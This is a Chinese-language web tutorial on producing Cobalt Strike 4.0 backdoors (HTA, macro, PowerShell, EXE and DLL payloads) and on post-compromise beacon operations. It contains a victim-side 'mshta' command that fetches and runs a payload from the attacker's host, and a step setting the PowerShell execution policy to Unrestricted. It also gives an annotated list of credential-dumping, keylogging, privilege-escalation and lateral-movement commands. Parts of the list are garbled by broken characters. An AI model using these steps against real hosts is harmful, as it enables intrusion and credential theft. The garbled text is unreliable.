溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么

發(fā)布時間:2021-12-24 14:30:30 來源:億速云 閱讀:138 作者:柒染 欄目:網(wǎng)絡(luò)管理

本篇文章為大家展示了CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么,內(nèi)容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細(xì)介紹希望你能有所收獲。

步驟:Attacks—〉Packages—〉如下:

  1. HTML Application 生成惡意的HTA木馬文件

  2. MS Office Macro 生成office宏病毒文件

  3. Payload Gene rator 生成各種語言版本的payload;

  4. Windows Executable 生成可執(zhí)行exe木馬;

  5. Windows Executable⑸ 生成無狀態(tài)的可執(zhí)行exe木馬。
    CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么

1.HTML Application

生成惡意的HTA木馬文件

  • —個HTML Application (HTML應(yīng)用)是一個使用HTML和一個Internet瀏覽器支持的腳本語言編寫的Windows程序。該程序包生成一個HTML應(yīng)用,該應(yīng)用運行一個CobaltSt rikepayload。你可以選擇可執(zhí)行的選項來獲取一個HTML應(yīng)用,此HTML應(yīng)用使得一個可執(zhí)行文件落地在磁盤上并運行它。

選擇PowerShell選項來得到一個HTML應(yīng)用

  • 該應(yīng)用使用PowerShell來運行一個payload。使用VBA選項來靜默派生一個MicrosoftExcel實例并運行一個惡意的宏來將payload注入到內(nèi)存中。

生成一個 HTML application

  • Attacks -> Packages -> Html Application

CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么

這里有三種工作方式

CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么

  • executable(生成可執(zhí)行攻擊腳本)

  • powershell(生成一個powershell的腳本)

  • VBA(生成一個vba的腳本,使用mshta命令執(zhí)行)

這里借鑒一個網(wǎng)上的方法,生成一個powershell,因為i兩外兩種方式上線不成功,然后配合host file使用。

CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么

然后會生成一個URL復(fù)制到

http://x.x.x.x:8008/download/file.ext

然后在受害者機(jī)器上運行

mshta http://x.x.x.x:8008/download/file.ext

然后CS端就可以收到上線了

CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么

2. MS Office Macro

該程序包生成一個MicrosoftOffice的宏文件并提供將宏嵌入Microsoft Word或Microsoft Excel的說明。這個參考我釣魚部分的宏文件制作部分的文章。

3.payload Generator

該程序包允許你以不同的多種格式導(dǎo)出Cobalt Strike的stager。

運行 Attacks -> packages --> payload generator

該模塊可以生成n種語言的后門Payload,包括C,C#,Python,Java,Perl,Powershell腳本,Powershell命 令,Ruby,Raw,免殺框架Veli中的shellcode等等…

CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么

滲透Windows主機(jī)過程中,用的比較多的就是Powershell和Powershell Command,主要是因為其方便 易用,且可以逃避一下殺毒軟件(AV)的查殺。

以Powe rshell Command為例,生成的payload為一串命令,只要在主機(jī)上執(zhí)行這一串命令(主機(jī)需安 裝Powe rshell), cs即可收到主機(jī)的beacon

CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么

4.Windows Executable (Windows 可執(zhí)行文件)

該程序包生成一個Windows可執(zhí)行Ar tifact,用于傳送一個payload stage r。這個程序包為你提供了多種輸出選項。

Windows Serv ice EXE 是一個 Windows 可執(zhí)行文件,可響應(yīng)Service Cont rol Manage r命令。你可以使用這個可執(zhí)行文件來作為使用sc命令起的Windows服務(wù)的調(diào)用程序,或使用Metasploit框架的PsExec模塊生成一個自定義的可執(zhí)行文件。

也就是說,普通的EXE和服務(wù)器啟動調(diào)用的EXE是有區(qū)別是。利用Windows ServiceEXE生成的EXE才能用來作為服務(wù)自啟動的EXE,利用Cobalt Strike中Windows exe生成的EXE不能作為服 務(wù)自啟動的EXE程序(因為不能響應(yīng)Service Control Manager)
CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么

Windows DLL (32-bit)是一個 x86 的 Windows DLL。

Windows DLL (64-bit)是一個x64的Windows DLL。這個DLL會派生一個32位的進(jìn)程,并且將你的監(jiān)聽器遷移至其上。這兩個DLL選項都會導(dǎo)出一個開始功能,此功能與rundll32 .exe相兼容。使用rundll32 .exe來從命令行加載你的DLL。勾選Use x64 payload框來生成匹配x64 stager的x64Ar tifact。勾選Sign executable file框來使用一個代碼簽名的證書來簽名一個EXE或DLL Ar tifact。你 必須指定一個證書,你必須在C2拓展文件中指定證書。

上面說了好多但是實踐非常簡單,只是需要確認(rèn)下受害者的電腦是X64還是X32直接運行我們生成的exe文件

CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么

5.Windows Executable(s)

該程序包直接導(dǎo)出Beacon (也就是payload stage),這個Beacon是作者寫好的32或64位DLL,是一個不使用stager的可執(zhí)行文件,直接和監(jiān)聽器連接、傳輸數(shù)據(jù)和命令。一個不使用stager的payload Ar tifact被稱為無階段的Ar tifact。這個程序包也有Powe rShell選項來導(dǎo)出Beacon作為一個PowerShell腳本,或raw選項導(dǎo)出與位置無關(guān)的beacon代碼。

默認(rèn)情況下,這個對話導(dǎo)出x86 payload stage。勾選Use x64 payload框來使用x64 Ar tifact生成一個x64 stage。勾選Sign executable file框來使用代碼簽名的證書來簽名一個EXE或DLL Artifact。

這里嘗試生成一個powershell馬

但是生成后直接運行不可行
CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么
這里要更改下他的策略

只有管理員才有權(quán)限更改這個策略。非管理員會報錯。查看腳本執(zhí)行策略,可以通過:

PS E:> Get-ExecutionPolicy

更改腳本執(zhí)行策略,可以通過

PS E:> Get-ExecutionPolicyRestrictedPS E:> Set-ExecutionPolicy UnRestricted

然后再次執(zhí)行:

CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么
CS4.0上線機(jī)器后操作
右鍵菜單:
CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么

一、Interact
進(jìn)入操作命令

二、Access
CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么

Dump Hashes # 獲取hash

Elevate #提權(quán)

Golden Ticket #生成黃金票據(jù)注入當(dāng)前會話

Make token #憑證轉(zhuǎn)換

Run Mimikatz # 運行Mimikatz

Spawn As #用其他用戶生成Cobalt Strike偵聽器

三、Explore

CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么

Browser Pivot #劫持目標(biāo)瀏覽器進(jìn)程

Desktop(VNC) #桌面交互

File Browser #文件瀏覽器

Net View #命令Net View

Port Scan #端口掃描

Process List #進(jìn)程列表

Screenshot # 截圖

四、Pivoting

CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么

SOCKS Server# 代理服務(wù)

Listener #反向端口轉(zhuǎn)發(fā)

Deploy VPN #部署VPN

五、Spawn
外部監(jiān)聽器(如指派給MSF,獲取meterpreter權(quán)限)

六、Session
CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么

Note #備注

color #標(biāo)注顏色

Remove #刪除

Sleep #指定被控端休眠時間,默認(rèn)60秒一次回傳,讓被控端每10秒來下載一次任務(wù)。實際中頻率 不宜過快,容易被發(fā)現(xiàn)。(心跳時間)

Exit #退出

interact打開beacon后執(zhí)行的操作:

1. argue 進(jìn)程參數(shù)欺騙

2. blockdlls 阻??進(jìn)程加載?Microsoft DLL

3. browserpivot 注?受害者瀏覽器進(jìn)程

4. bypassuac 繞過UAC提升權(quán)限

5. cancel 取消正在進(jìn)?的下載

6. cd 切換?錄

7. checkin 強(qiáng)制讓被控端回連?次

8. clear 清除beacon內(nèi)部的任務(wù)隊列

9. connect Connect to a Beacon peer over TCP

10. covertvpn 部署Covert VPN客戶端

11. cp 復(fù)制?件

12. dcsync 從DC中提取密碼哈希

13. desktop 遠(yuǎn)程桌?(VNC)

14. dllinject 反射DLL注?進(jìn)程

15. dllload 使?LoadLibrary將DLL加載到進(jìn)程中

16. download 下載?件

17. downloads 列出正在進(jìn)?的?件下載

18. drives 列出?標(biāo)盤符

19. elevate 使?exp

20. execute 在?標(biāo)上執(zhí)?程序(?輸出

21. execute-assembly 在?標(biāo)上內(nèi)存中執(zhí)?本地.NET程序

22. exit 終?beacon會話

23. getprivs Enable system privileges on current token

24. getsystem 嘗試獲取SYSTEM權(quán)限

25. getuid 獲取?戶ID

26. hashdump 轉(zhuǎn)儲密碼哈希值

27. help 幫助

28. inject 在注?進(jìn)程?成會話

29. jobkill 結(jié)束?個后臺任務(wù)

30. jobs 列出后臺任務(wù)

31. kerberos_ccache_use 從ccache?件中導(dǎo)?票據(jù)應(yīng)?于此會話

32. kerberos_ticket_purge 清除當(dāng)前會話的票據(jù)

33. kerberos_ticket_use Apply 從ticket?件中導(dǎo)?票據(jù)應(yīng)?于此會話

34. keylogger 鍵盤記錄

35. kill 結(jié)束進(jìn)程

36. link Connect to a Beacon peer over a named pipe

37. logonpasswords 使?mimikatz轉(zhuǎn)儲憑據(jù)和哈希值

38. ls 列出?件

39. make_token 創(chuàng)建令牌以傳遞憑據(jù)

40. mimikatz 運?mimikatz

41. mkdir 創(chuàng)建?個?錄

42. mode dns 使?DNS A作為通信通道(僅限D(zhuǎn)NS beacon)

43. mode dns-txt 使?DNS TXT作為通信通道(僅限D(zhuǎn) beacon)

44. mode dns6 使?DNS AAAA作為通信通道(僅限D(zhuǎn)NS beacon)

45. mode http 使?HTTP作為通信通道

46. mv 移動?件

47. net net命令

48. note 備注

49. portscan 進(jìn)?端?掃描

50. powerpick 通過Unmanaged PowerShell執(zhí)?命令

51. powershell 通過powershell.exe執(zhí)?命令

52. powershell-import 導(dǎo)?powershell腳本

53. ppid Set parent PID for spawned post-ex jobs

54. ps 顯示進(jìn)程列表

55. psexec Use a service to spawn a session on a host

56. psexec_psh Use PowerShell to spawn a session on a host

57. psinject 在特定進(jìn)程中執(zhí)?PowerShell命令

58. pth 使?Mimikatz進(jìn)?傳遞哈希

59. pwd 當(dāng)前?錄位置

60. reg Query the registry

61. rev2self 恢復(fù)原始令牌

62. rm 刪除?件或?件夾

63. rportfwd 端?轉(zhuǎn)發(fā)

64. run 在?標(biāo)上執(zhí)?程序(返回輸出)

65. runas 以其他?戶權(quán)限執(zhí)?程序

66. runasadmin 在?權(quán)限下執(zhí)?程序

67. runu Execute a program under another PID

68. screenshot 屏幕截圖

69. setenv 設(shè)置環(huán)境變量

70. shell 執(zhí)?cmd命令

71. shinject 將shellcode注?進(jìn)程

72. shspawn 啟動?個進(jìn)程并將shellcode注?其中

73. sleep 設(shè)置睡眠延遲時間

74. socks 啟動SOCKS4代理

75. socks stop 停?SOCKS

76. spawn Spawn a session

77. spawnas Spawn a session as another user

78. spawnto Set executable to spawn processes into

79. spawnu Spawn a session under another PID

80. ssh 使?ssh連接遠(yuǎn)程主機(jī)

81. ssh-key 使?密鑰連接遠(yuǎn)程主機(jī)

82. steal_token 從進(jìn)程中竊取令牌

83. timestomp 將?個?件的時間戳應(yīng)?到另?個?件

84. unlink Disconnect from parent Beacon

85. upload 上傳?件

86. wdigest 使?mimikatz轉(zhuǎn)儲明?憑據(jù)

87. winrm 使?WinRM橫向滲透

88. wmi 使?WMI橫向滲透

上述內(nèi)容就是CobalStrike 4.0 生成后門幾種方式及主機(jī)上線后基礎(chǔ)操作是什么,你們學(xué)到知識或技能了嗎?如果還想學(xué)到更多技能或者豐富自己的知識儲備,歡迎關(guān)注億速云行業(yè)資訊頻道。

向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報,并提供相關(guān)證據(jù),一經(jīng)查實,將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI